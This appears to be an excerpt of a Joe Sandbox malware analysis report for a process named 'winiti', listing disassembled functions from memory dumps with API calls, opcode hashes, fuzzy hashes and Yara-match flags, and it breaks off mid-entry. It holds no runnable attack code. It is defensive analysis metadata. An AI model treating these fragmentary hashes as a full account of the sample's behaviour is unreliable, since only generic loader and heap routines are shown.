                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                              Function 00D7FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 304 d7fae8-d7fafd LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                              Function 00D7FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 305 d7fb68-d7fb7d LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                              Function 00D7FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                              • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                              • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                              • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                              Function 0042C263 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 205 42c263-42c2a7 call 404703 call 42d153 RtlFreeHeap
                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C2A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap
                              • String ID: ^gA
                              • API String ID: 3298025750-2986628814
                              • Opcode ID: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                              • Instruction ID: 94010e64c3ac40ebaa8637d687da895893a5285f039648f1696056085be2b873
                              • Opcode Fuzzy Hash: 17568c7ae09f18499743ae8ac1d4d72313a42befbe6544b35fb4508f614ffe59
                              • Instruction Fuzzy Hash: 7DE06DB26042047BD610EE99DC41EAB33ACEFC9710F00441AFA18A7242D674B910CAB9
                              Function 00417A83 Relevance: 1.5, APIs: 1, Instructions: 49libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 253 417a83-417aa0 254 417a32-417a40 call 42f203 253->254 255 417aa2-417aa4 253->255 258 417a50-417a61 call 42d663 254->258 259 417a42-417a4d call 42f4a3 254->259 264 417a63-417a77 LdrLoadDll 258->264 265 417a7a-417a7d 258->265 259->258 264->265
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                              • Instruction ID: 5467ce7baa1be35fd542a387db4fa72fba50a4fd1dc026b6fc6d13751b3d1b69
                              • Opcode Fuzzy Hash: 9aead03d5917cd9eedf64c213fed65a1ff43d0142e135a2e87ed648fb51c44ed
                              • Instruction Fuzzy Hash: B50124B1E04108BBDB10DBA49C52FDFBB78DF11348F1440AAE94893241F635EA05C7A1
                              Function 00417AA5 Relevance: 1.5, APIs: 1, Instructions: 35libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 281 417aa5-417ab0 282 417ab2-417abb 281->282 283 417a58-417a61 281->283 286 417aa2-417aa4 282->286 287 417abd-417ac6 282->287 284 417a63-417a77 LdrLoadDll 283->284 285 417a7a-417a7d 283->285 284->285
                              APIs
                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: Load
                              • String ID:
                              • API String ID: 2234796835-0
                              • Opcode ID: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                              • Instruction ID: 649d61dad93b3462b7384ddc33fd9c8a8ef157cfa8b9e39ff11f18283cf64051
                              • Opcode Fuzzy Hash: 5de6b12b75050224d6ddde39596448764a2b6bb350762c52e3b39eaf53d6926f
                              • Instruction Fuzzy Hash: A5F0903920811AAED710CA94CC41FDDBBB4EF45694F04479AE968971C1D631AA498785
                              Function 0042C213 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 288 42c213-42c254 call 404703 call 42d153 RtlAllocateHeap
                              APIs
                              • RtlAllocateHeap.NTDLL(?,0041E3BE,?,?,00000000,?,0041E3BE,?,?,?), ref: 0042C24F
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                              • Instruction ID: bf3421da550d34a33725b684d4c833155ef629d3a1766f7896df30323ebfda8e
                              • Opcode Fuzzy Hash: e6e382b7dac3f798f8f3023e391c5777cc1d513eddb89b76d97a022a8894131b
                              • Instruction Fuzzy Hash: C3E065B2604304BBD610EE99EC41EEB33ECEFC9754F004019FA08A7241C674B9108AB9
                              Function 0042C2B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 298 42c2b3-42c2ec call 404703 call 42d153 ExitProcess
                              APIs
                              • ExitProcess.KERNELBASE(?), ref: 0042C2E7
                              Memory Dump Source
                              • Source File: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_winiti.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID:
                              • API String ID: 621844428-0
                              • Opcode ID: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                              • Instruction ID: ca7a2a84a7f801cb252aaa35fdd09469841853465a89a090f00c38a162972b51
                              • Opcode Fuzzy Hash: 692240f82839e6ec99a492d051d73a3b7a6c2aa1fbb4de7833b58e73ace8f1c9
                              • Instruction Fuzzy Hash: EDE04F316442157BC610AA5ADC41FA7B76CDFC5754F50442AFA0867281C675B91187E4

                              Non-executed Functions

                              Function 00D70080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID: [Pj
                              • API String ID: 0-2289356113
                              • Opcode ID: 47b5b470b6a2f1f411696bd53cd95863adda26d2e80af912a5d8e5c072b411d8
                              • Instruction ID: 50a30399d3f2adc0ba77f79646e998cef65503ff27ce87b3a3bd881ad68a45d4
                              • Opcode Fuzzy Hash: 47b5b470b6a2f1f411696bd53cd95863adda26d2e80af912a5d8e5c072b411d8
                              • Instruction Fuzzy Hash: 1BF06271204245ABD7219B10CC85F2A7BA5FF45764F14C41CF5896A0D3E772C811D731
                              Function 00D926F8 Relevance: .0, Instructions: 44COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                              • Instruction ID: a8346f53ed3bb9fe37330f8e10f73d07b8875d4132521f8ac37805cddf4c469d
                              • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                              • Instruction Fuzzy Hash: A6F0C231324159BFDF48EA989D5277A33D6EB94300F58C039ED89DB246D631DD4083B1
                              Function 00DD0101 Relevance: .0, Instructions: 31COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                              • Instruction ID: 8465feb1cc8e4c1a9d85fa75a78f96b1f52a728118057b7c02bed5fb62b2d481
                              • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                              • Instruction Fuzzy Hash: 24F0FE722403049FCB5CCF08C491BB97BA6AB90715F24446EE50BCF791D735D941D665
                              Function 00D700EA Relevance: .0, Instructions: 20COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1059ea57f0ccdd414b88bceb1f1f406953c73ce1bb1b60155142865707891f1c
                              • Instruction ID: 6e1793935370dc0222d7973e917f5c6f1e228c1479b395370dac324a3043d775
                              • Opcode Fuzzy Hash: 1059ea57f0ccdd414b88bceb1f1f406953c73ce1bb1b60155142865707891f1c
                              • Instruction Fuzzy Hash: 36E01AB1644B91CBD321DF14D901B1AB7E4FF88B10F15883AF809D7790E7789A05C972
                              Function 00D800C4 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                              Function 00D80048 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                              Function 00D80078 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                              Function 00D80060 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                              Function 00D801D4 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                              Function 00D8010C Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E70000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000ED0000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_d60000_winiti.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                              Function 00D80C40 Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D60000, based on PE: true
                              • Associated: 00000006.00000002.453421524.0000000000D60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E60000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E64000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000006.00000002.453421524.0000000000E67000.00000040.00001000.00020000.00000000.sdmpDownload File
